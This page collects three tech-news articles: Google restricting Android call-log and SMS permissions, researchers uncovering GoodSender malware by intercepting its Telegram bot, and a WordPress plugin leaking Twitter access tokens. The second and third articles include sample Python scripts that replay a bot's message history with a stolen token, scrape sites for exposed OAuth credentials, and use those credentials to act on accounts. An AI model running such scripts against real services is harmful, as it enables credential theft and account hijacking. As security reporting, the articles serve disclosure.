Google starts pulling unvetted Android apps that access call logs and SMS messages

Google is removing apps from Google Play that request permission to access call logs and SMS text message data but haven’t been manually vetted by Google staff.

The search and mobile giant said the removals are part of a move to cut down on apps that have access to sensitive calling and texting data.

Google said in October that Android apps will no longer be allowed to use the legacy permissions as part of a wider push for developers to use newer, more secure and privacy-minded APIs. Many apps request access to call logs and texting data to verify two-factor authentication codes, for social sharing, or to replace the phone dialer. But Google acknowledged that this level of access can be, and has been, abused by developers who misuse the permissions to gather sensitive data — or mishandle it altogether.

“Our new policy is designed to ensure that apps asking for these permissions need full and ongoing access to the sensitive data in order to accomplish the app’s primary use case, and that users will understand why this data would be required for the app to function,” wrote Paul Bankhead, Google’s director of product management for Google Play.

Any developer wanting to retain the ability to ask a user’s permission for calling and texting data has to fill out a permissions declaration.

Google will review the app and why it needs to retain access, and will weigh several considerations, including why the developer is requesting access, the user benefit of the feature requesting access, and the risks associated with having access to call and texting data.

Bankhead conceded that under the new policy, some use cases will “no longer be allowed,” rendering some apps obsolete.

So far, tens of thousands of developers have already submitted new versions of their apps that remove the need for call and texting permissions, Google said, or have submitted a permissions declaration.

Developers with a submitted declaration have until March 9 to receive approval or remove the permissions. In the meantime, Google has a full list of permitted use cases for the call log and text message permissions, as well as alternatives.

The last two years alone have seen several high-profile cases of Android apps or other services leaking or exposing call and text data. In late 2017, popular Android keyboard ai.type exposed a massive database of 31 million users, including 374 million phone numbers.

Decrypted Telegram bot chatter revealed as new Windows malware

Sometimes it takes a small bug in one thing to find something massive elsewhere.

During a recent investigation, security firm Forcepoint Labs said it found a new kind of malware taking instructions from a hacker sending commands over the encrypted messaging app Telegram.

The researchers described their newly discovered malware, dubbed GoodSender, as a “fairly simple” Windows-based malware, about a year old, that uses Telegram as the channel over which it listens and waits for commands. Once the malware infects its target, it creates a new administrator account and enables remote desktop — and waits. As soon as it does, the malware sends the username and randomly generated password back to the hacker through Telegram.

It’s not the first time malware has used a commercial service to communicate with its operator: hackers have hidden commands in pictures posted to Twitter and in comments left on celebrity Instagram posts.

But using an encrypted messenger makes it far harder to detect. At least, that’s the theory.

Forcepoint said in its research out Thursday that it only stumbled on the malware after it found a vulnerability in Telegram’s notoriously bad encryption.

End-to-end messages are encrypted using the app’s proprietary MTProto protocol, long slammed by cryptographers for leaking metadata and having flaws, and likened to “being stabbed in the eye with a fork.” Its bots, however, only use traditional TLS — or HTTPS — to communicate. That weaker protection makes it easy to man-in-the-middle the connection and abuse the bot API not only to read messages sent to and from a bot, but also to recover the full messaging history of the target bot, the researchers say.

When the researchers found the hacker using a Telegram bot to communicate with the malware, they dug in to learn more.

Fortunately, they were able to trace back the bot’s entire message history to the malware because each message had a unique message ID that increased incrementally, allowing the researchers to run a simple script to replay and scrape the bot’s conversation history.
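The article doesn’t spell out how such a replay script works, but the general idea is easy to sketch: because a bot’s message IDs are sequential, anyone holding the bot’s API token can simply walk the ID space. Below is a minimal illustration, assuming the bot token and chat IDs (BOT_TOKEN, SOURCE_CHAT_ID, DEST_CHAT_ID) have already been recovered; it uses the Telegram Bot API’s forwardMessage method, one plausible way to replay a bot’s history, not necessarily the exact script Forcepoint used.

```python
import time
import requests

# Placeholder values -- in the Forcepoint case these would have come from
# the intercepted bot traffic; they are hypothetical here.
BOT_TOKEN = "123456:ABC-DEF"        # the target bot's API token
SOURCE_CHAT_ID = 111111111          # chat whose history is being replayed
DEST_CHAT_ID = 222222222            # a chat the researcher controls

API = f"https://api.telegram.org/bot{BOT_TOKEN}/forwardMessage"

def replay_history(first_id: int, last_id: int) -> None:
    """Walk the sequential message IDs and forward each message to our own chat."""
    for message_id in range(first_id, last_id + 1):
        resp = requests.post(API, data={
            "chat_id": DEST_CHAT_ID,
            "from_chat_id": SOURCE_CHAT_ID,
            "message_id": message_id,
        })
        if resp.ok and resp.json().get("ok"):
            print(f"recovered message {message_id}")
        # IDs of deleted or inaccessible messages simply fail; skip them.
        time.sleep(0.1)  # stay under Telegram's rate limits

if __name__ == "__main__":
    replay_history(1, 5000)
```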

The GoodSender malware is active and sends its first victim information. (Image: Forcepoint)

“This meant that we could track [the hacker’s] first steps towards creating and deploying the malware all the way through to current campaigns in the form of communications to and from both victims and test machines,” the researchers said.

Your bot uncovered and your malware discovered — what could make it worse for the hacker? The researchers know who they are.

Because the hacker didn’t keep a clear separation between their development and production workspaces, the researchers say they were able to track the malware author, who used their own computer and didn’t mask their IP address.

The researchers could also see exactly what commands the malware would listen to: take screenshots, remove or download files, get IP address data, copy whatever’s in the clipboard, and even restart the PC.

But the researchers don’t have all the answers. How did the malware get onto victim computers in the first place? They suspect the hacker used the so-called EternalBlue exploit, a hacking tool designed to target Windows computers, developed by and stolen from the National Security Agency, to gain access to unpatched computers. And they don’t know how many victims there are, except that there are likely more than 120 victims in the U.S., followed by Vietnam, India, and Australia.

Forcepoint informed Telegram of the vulnerability. TechCrunch also reached out to Telegram’s founder and chief executive Pavel Durov for comment, but didn’t hear back.

If there’s a lesson to learn? Be careful using bots on Telegram — and certainly don’t use Telegram for your malware.

A popular WordPress plugin leaked access tokens capable of hijacking Twitter accounts

A popular WordPress plugin, installed on thousands of websites to help users share content on social media sites, left linked Twitter accounts exposed to compromise.

The plugin, Social Network Tabs, was storing so-called account access tokens in the source code of the WordPress website. Anyone who viewed the source code could see the linked Twitter handle and the access tokens. These access tokens keep you logged in to the website on your phone and your computer without having to re-type your password every time or enter your two-factor authentication code.

But if stolen, most sites can’t differentiate between a token used by the account owner and one used by a hacker who stole it.

Baptiste Robert, a French security researcher who goes by the online handle Elliot Alderson, found the vulnerability and shared details with TechCrunch.

In order to test the bug, Robert found 539 websites using the vulnerable code by searching PublicWWW, a website source code search engine. He then wrote a proof-of-concept script that scraped the publicly available code from the affected websites, collecting access tokens for more than 400 linked Twitter accounts.
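Robert’s proof-of-concept isn’t public, but the general approach is straightforward to sketch: fetch each affected page and pull the credentials out of the publicly served HTML. The snippet below is a minimal illustration; the variable-name patterns (consumer_key, oauth_token and so on) are assumptions, not necessarily the exact names the plugin used.

```python
import re
import requests

# Hypothetical key names -- the real plugin may embed the credentials
# under different JavaScript variable names.
PATTERNS = {
    "consumer_key":       re.compile(r'consumer_key["\']?\s*[:=]\s*["\']([^"\']+)'),
    "consumer_secret":    re.compile(r'consumer_secret["\']?\s*[:=]\s*["\']([^"\']+)'),
    "oauth_token":        re.compile(r'oauth_token["\']?\s*[:=]\s*["\']([^"\']+)'),
    "oauth_token_secret": re.compile(r'oauth_token_secret["\']?\s*[:=]\s*["\']([^"\']+)'),
}

def extract_tokens(url: str) -> dict:
    """Download a page's public HTML and look for exposed Twitter credentials."""
    html = requests.get(url, timeout=10).text
    found = {}
    for name, pattern in PATTERNS.items():
        match = pattern.search(html)
        if match:
            found[name] = match.group(1)
    return found

if __name__ == "__main__":
    # A list of candidate sites (e.g. from a PublicWWW search) would go here.
    for site in ["https://example.com/"]:
        tokens = extract_tokens(site)
        if len(tokens) == len(PATTERNS):
            print(site, "exposes a full set of Twitter credentials")
```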

Using the obtained access tokens, Robert tested their permissions by directing those accounts to ‘favorite’ a tweet of his choosing over a hundred times. This confirmed that the exposed account keys had “read/write” access — effectively giving him, or a malicious hacker, complete control over the Twitter accounts.
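A write test like that amounts to a single authenticated API call. The sketch below shows the idea using Twitter’s since-retired v1.1 favorites/create endpoint and the requests_oauthlib library; the credential values are placeholders standing in for whatever the plugin exposed, and the tweet ID is hypothetical.

```python
import requests
from requests_oauthlib import OAuth1

# Placeholder credentials -- in the real case, all four values were
# scraped from the vulnerable sites' page source.
CONSUMER_KEY = "..."
CONSUMER_SECRET = "..."
ACCESS_TOKEN = "..."
ACCESS_TOKEN_SECRET = "..."

def favorite_tweet(tweet_id: str) -> bool:
    """Try to 'favorite' a tweet; success shows the token has write access."""
    auth = OAuth1(CONSUMER_KEY, CONSUMER_SECRET, ACCESS_TOKEN, ACCESS_TOKEN_SECRET)
    resp = requests.post(
        "https://api.twitter.com/1.1/favorites/create.json",
        params={"id": tweet_id},
        auth=auth,
    )
    return resp.status_code == 200

if __name__ == "__main__":
    if favorite_tweet("1234567890"):  # hypothetical tweet ID
        print("token has read/write access")
```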

The vulnerable accounts included a couple of verified Twitter users, several accounts with tens of thousands of followers, a Florida sheriff’s office, a casino in Oklahoma, an outdoor music venue in Cincinnati, and more.

Robert told Twitter of the vulnerability in the third-party plugin on December 1, prompting the social media giant to revoke the keys and render the accounts safe again. Twitter also emailed the affected users about the security lapse in the WordPress plugin, but did not comment on the record when reached.

Twitter did its part — what little it could do when the security issue is out of its hands. Any WordPress user still using the plugin should remove it immediately, change their Twitter password, and ensure that the app is removed from Twitter’s connected apps to invalidate the token.

Design Chemical, a Bangkok-based software house that developed the buggy plugin, did not return a request for comment when contacted prior to publication.

On its website, it says the seven-year-old plugin has been downloaded more than 53,000 times. The plugin, last updated in 2013, still gets dozens of downloads each day.

MITRE assigned the vulnerability CVE-2018-20555. It’s the second bug Robert has disclosed in as many days.